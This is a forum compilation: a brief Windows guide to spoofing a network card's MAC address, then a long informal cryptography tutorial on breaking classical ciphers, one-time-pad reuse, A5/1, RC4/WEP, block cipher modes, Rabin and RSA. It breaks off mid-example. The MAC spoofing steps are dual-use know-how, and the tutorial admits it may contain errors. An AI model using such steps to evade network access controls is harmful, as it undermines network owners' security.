Implementing a spoofed MACThis can be dangerous and I take not responsibility for damage to network cards etc etc if your NIC decides to fry, blow up and/or screw your girlfriend i take no responsibility.

Firstly disconnect yourself from the network as its morally wrong to do this whilst connected.

Go to your "Network Connections" menu. Here the network cards are displayed as icons.

Right click the icon you want to change and click "properties"

Select "Configure"

Go to the Advanced tab

Scroll down and find "Network Address" in the list box

To the right select the option button and input your own custom MAC address.

Launch a command prompt window and type "IPConfig /all" and check to see if the MAC has changed.

For you IT support lads out there you can find out a remote end users MAC address by using the command prompt line "GETMAC" (see previous chapters).

As i said earlier.... quick, cheap and dirty... there are alternative methods such as registry hacks etc but thats not so quick and dirty.

CryptographyA little about CryptographyAuthor: YuipThere's lots of threads on this forum about cryptography etc. but none of them are particularly comprehensive (or, if I'm brutally honest, particularly correct) so I thought I'd write something about it. There are likely loads of errors below, but it's too long for me to re-read and check! Once again it's rather too long, so I had to divide it into two posts for the sake of the forum software.

This will be divided into roughly four sections, each getting more mathematical. The first section will be on some basic (i.e. classical) ciphers, which you'll most likely know most of. I will emphasize how to break these more than anything else. The next section will include an outline of the more modern approach to cryptography, and the third section will of course talk about RSA (and friends). The final section will close with some final thoughts, and also roughly how to break d4de's 'Closecrypt Encryption System v1.0' in 3 easy steps.

If you have trouble following the math, do ask me to explain. (You may also want to brush up on your math if this is the case - else you'll be stuck forever in noob-dom.) I've kept the math as simple as possible in the first few sections. In addition, I will not go into detail in all parts, since I don't know what people are interested in. If anyone is interested in more technical depth, let me know and I'll add that in.

Finally some simple terminology: plaintext refers to the message we want to send, unencrypted. Ciphertext refers to encrypted plaintext.

Classical Crytography - Stupidity, Substitution, Transposition, OverconfidenceIn this section we will cover some classical ciphers, and show how they are broken. Since this is Very Basic Stuff, I'll not go into great detail, as you can read loads about this anywhere, and you probably know it all anyway.

We'll start with 'Stupidity', more commonly known as the Caesar cipher. You'll almost surely know how this works. We simply pick a number from 1 to 25 and shift each letter of our plaintext this many along (looping round if necessary). So if we were to encrypt the plaintext 'SECRET' with the number 6 then S would go to Y, E would go to K etc. giving the ciphertext 'YKIXKZ'. To decrypt, we simply shift the letters back 6. If we don't know the magic number, then we can't do this.

This is probably the simplest cipher possible. And it is really stupid. As the attacker we just need to figure out the number that is being used. Since there are only 25 possibilities, given a ciphertext, there are only 25 possible plaintexts. Chances are only one of them will make any sense, so we can

just try all 25. So really this cipher is completely useless. But we probably already knew that. However it's useful to keep this cipher in mind, even if it is very simple, as it demonstrates the basics concepts we will deal with. In particular we can understand the general form all encryption schemes take. We have a function into which we feed a plaintext and a key (in this case a number from 1 to 25) and it returns a ciphertext. To decrypt we have a function that takes a ciphertext and a key and returns the plaintext. The key is kept secret from the attacker, so in theory he can't decrypt the message. We'll talk about this general setup more later.

So what is is that makes this cipher so useless? The problem is the possible keys are very small in number, so we can just try them all. This may seem like an obvious problem and something that can easily be avoided, but as we'll see later DES actually suffered from the same problem.

So now we'll move on to a much better cipher: the substitution cipher. Again you very likely know this one - we choose a permutation of the alphabet, and each letter is substituted for another according to this permutation. So for example we might write something like:

Code:

Plaintext: ABCDEFGHIJKLMNOPQRSTUVWXYZCiphertext: REWQTYUIOPASDFGHJKLZXCVBNM

Here the permutation we have chosen is REWQTYUIOPASDFGHJKLZXCVBNM, and so given our plaintext we replace all occurrences of the letter A with R, B with E, C with W etc. so 'SECRET' would become 'LTWKTZ'. To decrypt we just need to know the permutation used. So we can understand the permutation chosen is the key for the encryption system. Already this is a far superior cipher - there are 26! possible keys. So a bruteforce test of all possible keys is out of the question. So are we safe? No. The cipher replaces each letter with another in a random way (which provides some 'confusion' as we shall talk about later) but it still preserves a lot of the structure of the plaintext (provides no 'diffusion') - in particular the same letter is always encrypted the same way. So just looking at 'LTWKTZ' I immediately see that there are two letters the same. This may not seem like much information, but if the message sent is a long message, then we can gain more information. So let's assume we have a really long message (several pages) that we have intercepted as an attacker. We can look for the most commonly occurring letter. Now if we know the language the plaintext is in, we can guess this is probably the letter 'E'. Similarly we can look for pairs of letters that appear together. The most common is 'TH'. Similarly, the most common triple of letters in English is 'THE'. Similarly 'T' and 'A' are the next most common letters after 'E'. Then we simply do some of these substitutions and look at what we get. We may then see certain patterns that we can guess, for example say we saw had the phrase 'thetXFe', (where lowercase letters are our guesses, and uppercase letters are the yet to be guessed substitutions) then we may guess X = i, F = m. As we guess more letters it becomes easier to fill in the remaining letters. You can find a good example of this in action on the Wikipedia page on Frequency Analysis. With some simple computer software this can be done very rapidly.

Of course there is a problem here - it is possible to write plaintext with deliberately skewed frequency distributions of letters (for example write your message without using the letter 'E') but this is not an ideal solution! So in fact, despite the large number of keys, this cipher is pretty useless too - it preserves far too much of the statistical structure of the plaintext.

So onto the next idea: transposition. Instead of replacing letters with other letters, we simply reorder the letters. There are many ways to do this. One common way is to divide up our plaintext into same length sections, write the sections below each other, and write out each column according to some permutation. So for example if we had the plaintext: 'ATTACK AT DAWN' we might divide it into sections of length 4:

Code:

ATTACKATDAWN

then we choose a permutation such as 1423, so we write out the first column, followed by the fourth column etc. to get 'ACDATNTKATAW' as our cipher text.

We have potentially quite a lot of keys here, especially if we divide it into longer sections. So are we safe? No. Clearly all you need to do to break this cipher is to be half decent at anagrams. Once you've cracked a little bit of the transposition, you know that the same transposition is applied repeatedly, so you have broken the cipher. This means that you can choose any bit of the cipher text to try and anagram with, which shouldn't be too hard.

So what's the point of this cipher? Normally we combine this cipher with other techniques such as substitution to make things more complicated. In fact if we substitute, then transpose, we have a much trickier cipher to break - frequency analysis is harder to use as the transposition means plain text will not be revealed and easily guessable, and anagramming won't work because of the substitution. In fact many modern block ciphers use a (much more complex and advanced) form of this idea.

Now we shall mention the Vigenere cipher. This is a fun cipher since it appears to beginners to be unbreakable (so they often use it). It's a simple polyalphabetic cipher. We choose a key as for the Caesar shift cipher, but instead we choose several numbers. So for example we might choose 7,14,2,23 as our key. Then we shift the first letter of our plaintext along 7, the second along 14, the third along 2, the fourth along 23, then the fifth along 7 again, etc. One immediate advantage of this is that the same letters in plaintext aren't necessarily substituted with the same letter in cipher text. Similarly if we see two letters the same in the ciphertext, they may be different letters in plaintext. So encrypting 'SECRET' with the above key we get 'ZSEOLH' - no repeated letters. This means frequency analysis will not work. However it is still broken. Imagine we know the length of the key (4 in this case). The we can divide up the ciphertext into four parts corresponding to each part of the key. Then these bits are just Caesar shift ciphers - we can use frequency analysis to guess the shift of each one. Bearing in mind that the key is often represented as a word for ease of memory (for example 'YUIP' would be the key 25,21,9,16) we can also use this to help guess the key (indeed we will assume the key is chosen this way when we discuss the running key variant below). So how do we get the length of the key?

In a large block of plaintext, the word 'THE' will probably come up many times. In particular there may be times when the 'T' of some of them line up at the same point of the key, so will, by chance, be encrypted using the same key letters, giving repeated groups of text in the ciphertext. So here is an example (borrowed from Wikipedia, since I can't be bothered to contrive one myself):

Code:

Ciphertext: DYDUXRMHTVDVNQDQNWDYDUXRMHARTJGWNQD

We see that DYDUXRMH is repeated, and the distance between them is 18. So assuming that they represent the same plaintext, the key length divides 18: so it is 18, 9, 6, 3, or 2. Further NQD is repeated, and the distance is 20 characters. So the key length also divides 20. Thus the only possibility is 2. I'll leave it to you to do the rest.

Vigenere CipherThe Vigenere cipher is actually very important because it is related in many ways to stream ciphers, which we shall discuss later. However one variant we will need to know about is the 'running key' variant. Clearly a way to improve the Vigenere cipher would be to have a key as long as the message. So for example, if we used a large block of our favorite piece of literature as the key, then it would of course never repeat, so would appear to be unbreakable. For those of you that know about One Time Pads, this is exactly the same, except that the key is not random, but rather a block of text from a book, agreed beforehand.

However, perhaps a little surprisingly, despite it being almost a One Time Pad, the security is usually quite poor. We can guess some probably text that is in the message or in the running key (for example a name or a location we might expect to be communicated). Then we simply run along the ciphertext, subtracting out our guess at each point. Eventually we'll get something intelligible (assuming our guessed text does indeed appear somewhere in the ciphertext or in the running key). Then it is likely that our guess is indeed part of either the plaintext or the running key at that point. We can normally extend this chunk of intelligible text at either end, providing us with more plaintext, which in turn can be extended, until we either get the whole message like this, or recognize the running key used. The problem here is that the entropy of both the plaintext and the key is low - essentially we can guess some of the text in the key and the plaintext, and extend from that. This is of course why this is not a problem for One Time Pads (see below) since there the key has high entropy, so we can't guess the key and we've no idea when our plaintext guess is correct.

In addition, the key space for the running key cipher isn't really that big - if the attacker has a large collection of texts you are likely to use then it may not take that long to try them all with a modern and powerful computer.

And so we reach the end of this relatively easy section. There are many other classical ciphers and it may be worth looking up some and thinking how you might go about breaking them. We may not have learnt any new or exciting ciphers, but we have seen some of the pitfalls that classical cryptography suffered from, as well as seen some ideas to make stronger ciphers.

Modern Cryptography - Formalizing, Types of Attack, Perfect SecrecySo now we've seen some classical ciphers and played with them a bit, we can take a break and be a little more abstract. This will allow us to develop a more rigorous understanding of what is involved in cryptography.

So what is an encryption system? Well we've already talked about this - it is a function that takes plaintexts and keys to ciphertexts, as well as providing an inverse decryption function that takes keys and ciphertexts to plaintexts. In particular, one obvious observation: if we fix the key, then different plaintexts must give different ciphertexts, and vice versa.

What do we want our system to do? Obviously if the attacker is given the ciphertext, we want it to be impossible for him to deduce the plaintext. However we may require more security - for example say that the attacker knows some of our plaintext - can he use this to figure out the rest? In the Vigenere cipher for example, if the attacker knows some plaintext, then he can deduce part or all of the key. This is called a known plaintext attack. Other examples might include a chosen plaintext attack - where the attacker can choose plaintext to encrypt with your key and observe the ciphertext output, although the attacker may not know the key to decrypt it (one obvious example where this attack is possible is public key cryptography). This may give him extra information about the key.

So what would 'perfect secrecy' mean? We want our encryption system to withstand all possible attacks - known plaintext, known ciphertext etc. We can phrase this more rigorously by saying that no matter how much information the attacker has, he can gain no more. So even if he knows a large part of the key, and some known plaintext, and can encrypt as much chosen plaintext as he likes, he can't deduce anything else about the message sent. Equivalently, the ciphertext gives absolutely no additional information about the plaintext. We can phrase this mathematically by saying that the conditional entropy of the plaintext given the ciphertext is the same as the entropy of the plaintext. This definition of perfect secrecy is due to Claude Shannon (the founder of modern information theory).

So is it possible to create perfect secrecy? Yes. I've already mentioned the One Time Pad. It has several implementations, but the most common way beginners think about it is as a Vigenere cipher where the key is completely random and as long as the ciphertext. Furthermore the same key is never reused. It is fairly easy to see why this is perfectly secure - if the key is truly random then given a ciphertext, any plaintext of the same length is possible depending on the key. Of course the problem with this is that it is very inconvenient - we have to first generate a truly random key. Then we have to distribute it securely to our agents, without it falling into enemy hands. They have to have a large enough key to allow them to send all the messages they will want to send, and not reuse the key. They also need a way to dispose of the key once used so it never falls into enemy hands. It is for this reason the One Time Pad is rarely used in practice. One particular problem (indeed a problem with all stream ciphers) is that it is easily broken if the key is reused.

Mathematically SpeakingI'm afraid modern cryptography does have a substantial math component. I've gone about as far as I can without using any math, but now I'm going to have to rephrase what we've said already in a

more mathematical way. As I've said though you'll be stuck in noob-land forever if you hate math, so get learning.

Okay, from now on we'll be working in a more computer friendly way. In the English alphabet we have 26 letters. When working with computers we normally think in binary, which is what we shall do now. So from now on a plaintext will be a string of 0s and 1s. How this is encoded is irrelevant (so for example we might convert letters to ASCII codes, then to binary) it just makes things easier to phrase mathematically.

So in the most general mathematical sense we say our alphabet consists of the symbols {0, 1} and our texts are simply all finite strings of symbols in our alphabet. Then an encryption function takes a plaintext from our space of texts and a key and gives a corresponding ciphertext in our space of texts (and no two plaintexts give the same ciphertext - the function is injective). If you don't like this formalism, don't worry, things are actually fairly intuitive.

So we can consider the One Time Pad in this way - the key is a random sequence of 0s and 1s, which we XOR (Exclusive OR) with the plaintext, to get the ciphertext. Although this is technically a different implementation from the above, it is essentially equivalent - we just have an alphabet with two letters. So we can give an example. Say I want to send a message 0111110001100010 to my friend, using the one time pad 0100010100101001110111011100011101001101101111, then I will XOR 0 with 0 to get 0, 1 with 1 to get 0, 1 with 0 to get 0 etc. to get the ciphertext: 0011100101001011. The advantage of this way of phrasing things, and using XOR, is that it makes everything simple - to decrypt I also XOR the ciphertext with the key.

So why can't we reuse our one time pad from the start for a second message? Well, lets explore the properties of XOR:

Code:

0 XOR 0 = 00 XOR 1 = 11 XOR 0 = 11 XOR 1 = 0

We note two things. Firstly 0 XOR 1 is the same as 1 XOR 0. This is a property known as commutativity - it doesn't matter which was round we do our operation. For example addition and multiplication are commutative operations: 2 + 3 = 3 + 2. However subtraction is not: 2 - 3 != 3 - 2. So if for example we did 0 XOR 1 XOR 0, then we can swap the first two arguments, so it is equal to 1 XOR 0 XOR 0. We know 0 XOR 0 = 0, so we just get 1. Before the 'bears' point out that I'm also assuming associativity here, yes I am. If this appears confusing, we can think of XOR in a much better way - modular arithmetic. Most people here will know modular (or sometimes clock) arithmetic. So I won't explain it (maybe someone else can). Then XOR is simply addition modulo 2. So in fact this complicated looking operation is actually just addition! ( 0 + 0 = 0, 0 + 1 = 1 + 0 = 1, 1 + 1 = 2 = 0 modulo 2) So actually all the standard properties of addition apply.

So lets assume that we have two plaintexts, encrypted with the same random key. Let us assume that the digits of the two plaintexts are p1,p2,p3,p4,.... and q1,q2,q3,q4,... and that the digits of the key is k1,k2,k3,k4,... Then as explained to form the ciphertexts we simply add the key to each of the plaintexts. So as the attacker, since they same part of the key has been used for both messages, we can see p1+k1,p2+k2,p3+k3,p4+k4,... and q1+k1,q2+k2,q3+k3,q4+k4,... Since the key has been reused if we now add together (XOR) the two ciphertexts, we get p1+2*k1+q1,p2+2*k2+q2,... etc. But this is just addition modulo two - so 2*k1, 2*k2 etc is just 0. Or if you prefer, k1 XOR k1 is just 0. So in fact when we add together the ciphertexts we are getting p1+q1,p2+q2,p3+q3,p4+q4,... But this is just the message p1,p2,p3,p4,... encrypted with a key of q1,q2,q3,q4,... - which is exactly the running key cipher (since we are using a piece of plaintext as a key) - so suddenly we can decrypt our message as explained before. Now might be a good time to go back to the first implementation of the one time pad (where we weren't working in binary) and figure out how this attack applies there.

Now that's all I'm going to say about the One Time Pad. Well, that's not entirely true - later when we talk about RSA I will highlight some more problems with it.

Practical Ciphers - Stream CiphersSo we've already discussed why the One Time Pad is completely impractical. Can we use the ideas of the Vigenere cipher, the running key cipher and the one time pad to make a practical yet secure cipher? Yes (or at least it appears so).

So the Vigenere cipher didn't work since our key repeated. The running key cipher didn't work since the key didn't have enough entropy. The one time pad was perfect, but the key was impractical to use. What if we could take a shorter key, and 'stretch' the entropy out to make a longer, pseudorandom key? Although the key wouldn't be truly random, it may be very difficult for the attacker to figure out how to predict what it looks like.

This is the principle behind Cryptographically Secure Pseudo Random Number Generators (or CSPRNG for short). For the moment lets forget about cryptographically secure and just think about random number generators.

Normally a random number generator takes an initial bit of entropy (called the seed) and uses that to generate a seemingly random sequence, much longer than the seed. The important point is that if we know the seed, the same sequence will be generated. So say we provide a seed of 110011. A random number generator might generate 101101 011110 110011. What it has done is put the outer two digits of the seed into the middle of the middle four digits (so 1 and 1 go in the middle of 1001). Then it does the same thing on what it just output. Then it does it again. This is an extremely rubbish random number generator. The important bit to note however is that is repeats - the third block is just the seed. So if we continued to generate output then we would get the same three blocks over and over. This is a property true of all pseudo random number generators. We can justify this mathematically, but I won't do that here (maybe in the last section). So one thing we are interested in is the size of the period of the generator. Here we can see it is always going to be three blocks before it starts to repeat. The longer the period the more the random number 'stretches' the entropy of the seed.

Now a cryptographically secure generator is one that is suited for cryptography. In particular it must have two properties: firstly if some output is known, it is not easy to guess the next bit with good probability (i.e. we cant use a polynomial time algorithm to guess it), and secondly, if at some point the state of the system becomes compromised, we can't recover previous bits of the output. So in our above stupid example, since the next block of numbers only depends on the previous block, if we knew the previous block we can guess the next block.

So why is this necessary for cryptographic security? Well imagine we were using a poor RNG to generate a key. If the attacker knew some of the plaintext (so a known plaintext attack) then he could XOR it with the ciphertext to recover a portion of the key. He could then use this to predict the output of the random number generator after that point in the key, and thus recover the rest of the message. If he can do this efficiently he can just guess likely plaintexts.

This is the challenge at the heart of stream ciphers. Their operation is simple - use an initial key as your seed, and a CSPRNG to generate output with a long period and use that as your one time pad key. Of course since this is not truly random we don't have perfect secrecy, but a well designed CSPRNG can provide practical secrecy, since it may be very hard (think as hard as factorizing large integers as in RSA) to predict the output of the RNG. As also explained we need a sufficiently large period for the RNG, so that the key won't repeat itself as in the Vigenere cipher.

A Real Stream CipherOkay so all this theory is all very well, but what does a real stream cipher look like? Well the answer is it's rather complicated. So we will give a very simple stream cipher that is used in practice, though not for cryptographic purposes (at least not securely!). Things will get a tiny bit mathematical now.

We need to understand the Linear Feedback Shift Register (LFSR) first. This is a very simple way to generate reasonably random looking output. an LFSR consists of an initial state, and some 'taps'. The taps are the bits that will influence the next bit output. So for example say I have the starting state of 4 bits: 0001. And I have chosen taps 3 and 4. Then this means that I take the 3rd bit and the 4th bit (0 and 1 respectively) and I XOR them, to get 1. Then I output 1. Then I replace the 4th bit with the 3rd bit, the 3rd bit with the 2nd bit, the 2nd bit with the first bit, the first bit with the number output (effectively shifting everything along and putting my output on the end) updating my current state to 1000. Then I repeat this, XORing the 3rd and 4th bit to get 0, output this, then update my current state to 0100. And I keep repeating this. So I get:

Code:

current LFSR state: output:0001 11000 00100 00010 11001 11100 0

0110 1...

We should be able to see why this is called a feedback shift register - we shift everything along and feed the number output into the end. It is linear since the output is a linear function of the current state. We can immediately see therefore that the future output depends on the last four bits of output, so clearly this is not cryptographically secure if we know the taps. So why have I mentioned it? Well LFSRs are simple - being linear means we can easily understand them mathematically. For example we know how big their periods can be, as well as their weaknesses. Secondly they are very simply to implement in hardware, as a result they crop up a lot in the real world since they are cheap to make.

Now if you are clever you may be thinking they could be cryptographically secure if we kept the tap sequence secret - since then we don't know how to generate the next output even if we know the current state. Well you'd be thinking the correct way, but you'd also be wrong. Using the Berlekamp-Massey algorithm we can find the shortest LFSR for a given output sequence quite easily.

But despite this, as I've said LFSRs can be and are used as PRNGs. Although used on their own for stream ciphers they are insecure they can be combined in certain ways to create more secure stream ciphers. Let us give a very real example of a use of LFSRs to create a stream cipher: A5/1.

Cellular Telephones - A5/1A5/1 is an LFSR based stream cipher that is used in your cellphone to protect your privacy. You can't get a more real world use than that!

So how does it work? We start with a 64-bit key, together with a 22-bit frame number (that is publicly known). We then have three LFSRs. The first LFSR has length 19 bits, and tap sequence 13,16,17,18. The second LFSR has length 22 bits and tap sequence 20,21. The third LFSR has length 23bits and tap sequence 7,20,21,22. The output of these three LFSRs will be XORed.

Initially all three registers are set to 0. Then for 64 cycles, the 64-bit secret key is mixed in to the stream in a certain way: the first bit of the key is XORed to the least significant bit of each LFSR, then the registers are clocked. Then the second bit is XORed to the least significant bit of each register and it is clocked again. This continues till we have clocked the registers 64 times. Then the 22-bit frame number is mixed in the same way. Then it is clocked 100 times and the output discarded. Then the cipher is ready to produce some keystream output.

Now if you have understood this you should see that it's not that strong. That's because I forgot a final point - not all the LFSRs are clocked together - each cycle the register is either clocked, or stays the same and outputs the same number as before. Whether or not a register is clocked depends on its 'clocking bit' - for registers 2 and 3 the clocking bit is bit number 10, for the first register it is bit number 8. So at each stage these three bits of the registers are compared. The majority bit (the more common bit of 0 and 1 in these three bits) is determined, and a register is clocked if the

clocking bit agrees with the majority bit. So for example if bit 8 of register 1 was '0' and bits 10 of registers 2 and 3 were both '1' the majority bit is '1' and registers 2 and 3 only are clocked that cycle. This makes things a little more complex and a little more tricky.

Now it may interest you to know that A5/1 is more or less broken. A practical attack is still being developed (although it would be reasonable if you thought that government agencies have already developed one), but it just involves building a very large lookup table so is just a matter of time.

It may also interest you to learn that A5/2 - the predecessor of A5/1 - is very broken. This is perhaps not suprising as it was created with input from government agencies (ostensibly for export restriction purposes).

CSPRNGs and Secure Stream CiphersSo what really secure stream ciphers can we develop? As we've mentioned it really depends on the CSPRNG we are using. One possibility is to use a really secure CSPRNG such as Blum Blum Shub - this has a strong number theoretic proof to show that it is as difficult to break as factorizing large numbers (we shall see more of this later). This has the disadvantage however that implementations are slow and not ideal for a lot of applications.

There are also other good stream ciphers. One very popular one you may wish to read about is RC4 - this is the most widely-used software stream cipher. In particular it is used in SSL, as well as WEP and WPA. It is now considered a little flawed and not recommended for use in new applications. The first few bits of the keystream are strongly non-random and leak information about the key. If RC4 is poorly used, this can be used to recover the key (The Fluhrer, Mantin, Shamir Attack) - most famously used to break WEP. This is an interesting (and not actually too hard) exercise for the reader who has found everything rather simple so far - write your own WEP decryption program (you may also want to implement Klein's Attack if you enjoy that).

Another way to generate a random keystream is to use a secure block cipher in counter mode (see below). Then of course our stream cipher is as secure as our block cipher. This can be a useful way of increasing our confidence in our encryption system - if we have a block cipher we trust, we can turn it into a stream cipher that we can also trust.

Block CiphersSo a block cipher is a symmetric key cipher (meaning the same key is used for both encryption and decryption) which operates on fixed length groups of bits - blocks. So for example a block cipher may take a 128-bit block of plainstext and give a 128-bit block of ciphertext.

We should already see a problem here - how do we encrypt messages longer than 128-bits (without being susceptible to a statistical attack)? The answer is to use a mode of operation. We'll talk about them in a minute.

So what does a block cipher look like? In generality, like before, given a key, it is simply a bijective

function on the set of blocks (there are obviously (2^n)! such functions).

Most block ciphers work by repeatedly applying a simpler function. As we mentioned earlier this can involve repeatedly substituting and permuting. As we've discussed neither of these operations are secure on their own, but together, in sufficiently long chains, they can provide both 'confusion' and 'diffusion' (which we shall talk about later). A cipher using only substitutions (S-boxes) and permutations (P-boxes) is called an SP-network. A special class if ciphers are Feistel networks, which you should know all about.

I won't detail the exact construction of block ciphers, as that's not very enlightening, but later I will talk about their construction as relating to Shannon's 'confusion and diffusion'.

So the other important aspect of a block cipher is the mode of operation. To see why we need to consider this, we shall first look at the simplest mode of operation - the sort of mode we might use if we are a bit naive: Electronic codebook (ECB). In this mode, the message is divided into blocks and each block is encrypted separately. The obvious problem here is that identical plaintext blocks are encrypted into identical ciphertext blocks, so this does not hide patterns well at all. This is particularly problematic for example if we are encrypting an image. Furthermore, as we'll talk about in the RSA section, this is trivially susceptible to a Replay Attack.

So another more secure mode would be CBC - Cipher-block chaining. This is simple - each block of plaintext is added (XORed) with the previous ciphertext block before being encrypted (we use a random Initialization Vector to XOR with the first block). In this way each ciphertext block is dependent on all plaintext blocks up to that point. This prevents the previous problem, but at the cost of not being able to parallelize encryption (we can't encrypt a block until the previous block has been encrypted).

Now there are other modes, but rather than go through them all, I'll mention just one more, one I talked about earlier: Counter (CTR) mode. We mentioned this in the context of stream ciphers - that is precisely what it does: turns a block cipher into a stream cipher. First we encrypt 0, then 1, then 2, etc. and use the output as our keystream. This is essentially using the block cipher as a CSPRNG. Obviously the period will be 2^n, which can be more than enough. Of course we'll also want to use a 'nonce' to XOR with the numbers we are encrypting to avoid reuse of the keystream. The advantage of this is we can easily parallelize the process.

So now we'll mention popular block ciphers. You will almost certainly know about DES - in many ways the original block cipher. This has a colorful history, which I won't really talk about (visit a library!), involving suspicions of backdoors and NSA involvement. You may have heard that DES is insecure and should not be used - you'd be right. Although there are some theoretical attacks (three publicly known) against DES they are not a concern in practice. The problem with DES is that it has a 56-bit key length (it is know that IBM were persuaded to shorten it by the NSA) which means a brute-force attack (simply trying all possible keys) is actually plausible. If you have the computing power it's really quite fast. DES was improved with TDES - Triple DES - which simply does DES three times (and so increases the key size). Despite being superseded by AES, TDES is still extensively used in electronic payments so will be around for a while yet.

So of course we have to mention AES - The Advanced Encryption Standard (as opposed to the Data Encryption Standard). This is a standardized block cipher (Rijndael) used as an encryption standard by the US government, amongst others. AES is an SP-network, not a Feistel network like DES. AES has a fixed block size of 128 bits and key sizes of 128, 192 or 256 bits (technically AES is not Rijndael as Rijndael supports larger block and key sizes). AES has a very neat algebraic description which has caused some worry about the actual security of AES. AES is of course what you will likely use to encrypt your hard drive.

Other common block ciphers include Blowfish, it's successor Twofish, and Serpent - the runner up to Rijndael in the AES process (and in fact more secure, although slower).

So how do we attack block ciphers? Well I'm afraid it involves some math that most here probably won't know. So we'll leave that for another time!

RSA and FriendsSo now we know about block ciphers and stream ciphers where does RSA fit in? You will of course know about RSA, and we shall discuss it properly here. There are many misconceptions about RSA, and I'll point them out as we go along. The math may step up a level in this section as well - but I can talk about the math here since it is more accessible that the corresponding stuff for block ciphers etc. I will assume you are familiar with modular arithmetic (by which I mean you actually know what modular arithmetic is - if you have just come across it in coding you probably don't!).

RSA is a public-key algorithm, as opposed to symmetric-key algorithms (being divided into stream ciphers and block ciphers). In practice public-key algorithms are computationally difficult, so normally your message will be encrypted using a symmetric-key algorithm like those already discussed, and they secret key for that encrypted with a public-key algorithm. This is one of the first misconceptions - a message encrypted with an RSA based scheme is not as strong as RSA; it is as strong as the weakest encryption used (which may be some rubbish stream cipher!). In designing a public key cryptosystem we are aiming for a high level of security - we want to be resistant to chosen plaintext attacks (since if the attacker has the public key he can choose as much plaintext to encrypt as he likes). In addition we want to overcome the difficulty of key exchange (which is a major point of public key cryptography). Either way we want to have public key, which we share with everyone and they use to encrypt messages to us, and a private key which only we have, and without which it is impossible to decrypt messages encrypted with our public key.

The idea of public key cryptosystems is to base them on mathematical problems that are believed to be hard. Two such problems we will consider are:

1 - Factoring. Let p,q be large primes - given N=pq, find p and q.

2 - Discrete logarithm. Let p be a large prime. Let g be a primitive root modulo p (i.e. a multiplicative generator). Given x, find a such that x = g^a (mod p).

It is important you understand the first of these. I will explain the second in more detail in the last section.

The key point is that polynomial time algorithms (recap: an algorithm runs in polynomial time if #operations < c(input size)^d for some constants c and d, or if you prefer you can use big O notation) are not known for these two problems (whereas they are known for Primality testing for example).

One method of solving problem 1 for example might involve trial division, but this requires O(sqrt(N)) operations. The best known methods for both problems involve using a Factor Base method called the Number Field Sieve. This has running time O(e^(((c log N)^1/3)(log log N)^2/3)) which, if you know what you are talking about, you might say is 'closer to polynomial time than exponential time'.

Since factorization is such an important problem you may have heard of the RSA challenge numbers - your chance to win lots of money for factorizing large numbers. An RSA number with 193 decimal digits was factored in 2005.

Okay, with this basic principles understood lets look at a public key cryptosystem. Since most people who think they understand RSA don't, we'll start with a different system - the Rabin Cryptosystem (don't worry too much if the math is a little tricky - you can still get the general idea). This is a little less elegant than RSA, but easier to analyze mathematically.

The Rabin CryptosystemIn the Rabin Cryptosystem, our private key consists of two large distinct primes, p and q, which are equal to 3 modulo 4.

Our public key is simply N=pq.

Then our message can be a number from sqrt(N) all the way to N-1. To encrypt is simple - we simply square m modulo N (this is why we need m greater than sqrt(N) else decryption is trivial!).

To decrypt we use a very basic mathematical fact:

Suppose p is a prime that is 3 modulo 4 (as is the case for the two primes in the Rabin cryptosystem), say p = 4k-1. Then if x^2 = d modulo p has a solution for x, then x = d^k is a solution (modulo p). This is clear since assuming d is non-zero, then x^(p-1) = 1 mod p (Fermat's Little Theorem) that is: x^(4k-2) = 1, so d^(2k-1) = 1 and so d is a solution.

So given a message c = m^2, we can use this to find x1 and x2 such that x1^2 = c mod p, x2^2 = c mod q. Via the Chinese Remainder Theorem we can find x such that x = x1 mod p, x = x2 mod q.

Then of course x^2 = c mod N. Of course there will actually be four distinct possibilities for x, any one of which could have been the original m. For this reason we would need to ensure messages have enough redundancy so that only one solution makes sense. This is one of the reasons the Rabin Cryptosystem, despite being in some ways 'stronger' than RSA, is not very common.

The particularly nice thing about Rabin is that we have the following theorem: Breaking the Rabin cryptosystem is essentially as difficult as factoring N. We can see one way by noting that if we can factor N we can get the secret key and decrypt as above. Conversely suppose we have an algorithm for computing square roots mod N. Picking x at random we can use this to find a y such that x^2 = y^2 modulo N. With probability 1/2 we have x != +/- y modulo N. Then clearly gcd(x-y, N) is a non-trivial factor of N. After r trials the probability of failure is 1/2^r so this can be made arbitrarily small.

Unfortunately this is not true for RSA - this is perhaps the biggest misconception about RSA - it is not yet known if breaking RSA is as difficult as factorizing (and there's some evidence to suggest that such a proof will never be found).

RSA in detailSo how does RSA work? If you already know then all the math should be easy for you.

We choose two large distinct primes, p and q and set N=pq.

Then we calculate phi(N) = (p-1)(q-1), so that if x is coprime (has no common factors with) to N then x^(phi(N)) = 1 mod N. (Euler-Fermat Theorem)

Now we pick an integer e which is coprime to phi(N). Then we calculate its multiplicative inverse, in other words find d such that de = 1 (mod phi(N)).

Then our public key is (N,e), and our private key is (N,d). To encrypt a message m (a number from 1 to N-1) we simply raise it to the power of e modulo N, so c = m^e mod N. To decrypt this message we simply raise c to the power of d modulo N. We check this works mathematically: c^d = m^(ed) = m modulo N (by Euler-Fermat). There is a possibility m is not coprime to N, but this is extremely unlikely so we ignore it.

So how strong is RSA? Clearly if we can factorize N we can recover d. In fact recovering the private key (N,d) from the public key alone (N,e) is essentially as difficult as factoring N. This time I am not going to prove this, since it is a little more mathematical than you may appreciate.

What is important is that this does not say that we can't break RSA another way, without knowledge of the private key. Clearly this would involve, similar to the Rabin Cryptosystem, finding e-th roots modulo N (as opposed to square roots in the Rabin Cryptosystem) in an efficient way. This is called

the RSA problem, and is also believed to be hard (like factorization and the discrete logarithm). In fact the best known way to attack RSA is to actually recover the secret key by factorizing N.

Diffie-Hellman Key ExchangeYou will likely have heard of this if you have ever read anything about RSA. It is a method for securely swapping a secret key for communications with for example a stream cipher. It works as follows: we choose a large prime p, and find a primitive root, g, modulo p.

Person A chooses some x and sends g^x mod p to person B. B chooses y and sends g^y to A. Then both A and B compute g^(xy) modulo p. This is then there secret key.

The attacker seeks to find g^(xy) from p, g, g^x, g^y (mod p). It is conjectured, although unproven, that this problem is as hard as the discrete log problem.

Attacks against RSA and friends

Okay, you may be thinking that RSA is invincible without a Quantum Computer or something that hasn't been (publicly) discovered yet. Well there are practical problems, many of which you may have come across.

Let's give an example (this is called, rather amusingly if you know your math, a homomorphism attack):

A bank sends a message (A, B) where A is the clients name, and B is the amount to be credited to her account. They encrypt the message using RSA and send (Y, Z) where Y = Aê, Z = Bê (mod N).

